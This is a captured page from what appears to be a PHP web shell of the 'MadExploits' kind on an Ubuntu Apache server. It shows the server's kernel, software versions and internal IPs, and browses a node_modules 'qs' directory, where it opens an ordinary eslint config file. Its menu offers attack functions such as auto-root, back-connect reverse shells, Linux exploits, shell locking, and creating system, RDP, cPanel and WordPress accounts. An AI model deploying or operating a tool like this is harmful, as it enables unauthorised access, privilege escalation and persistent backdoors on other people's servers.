Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
server /
node_modules /
qs /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
597
B
-rw-r--r--
.nycrc
216
B
-rw-r--r--
CHANGELOG.md
32.77
KB
-rw-r--r--
LICENSE.md
1.56
KB
-rw-r--r--
README.md
25.28
KB
-rw-r--r--
eslint.config.mjs
1.42
KB
-rw-r--r--
package.json
3.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : eslint.config.mjs
import ljharbConfig from '@ljharb/eslint-config/flat'; export default [ { ignores: ['dist/'], }, ...ljharbConfig, { rules: { complexity: 'off', 'consistent-return': 'warn', 'func-name-matching': 'off', 'id-length': [ 'error', { max: 25, min: 1, properties: 'never', }, ], indent: ['error', 4], 'max-lines': 'off', 'max-lines-per-function': [ 'error', { max: 150 }, ], 'max-params': ['error', 18], 'max-statements': ['error', 100], 'multiline-comment-style': 'off', 'no-continue': 'warn', 'no-magic-numbers': 'off', 'no-restricted-syntax': [ 'error', 'BreakStatement', 'DebuggerStatement', 'ForInStatement', 'LabeledStatement', 'WithStatement', ], }, }, { files: ['test/**'], rules: { 'function-paren-newline': 'off', 'max-lines-per-function': 'off', 'max-statements': 'off', 'no-buffer-constructor': 'off', 'no-extend-native': 'off', 'no-throw-literal': 'off', }, }, ];
Close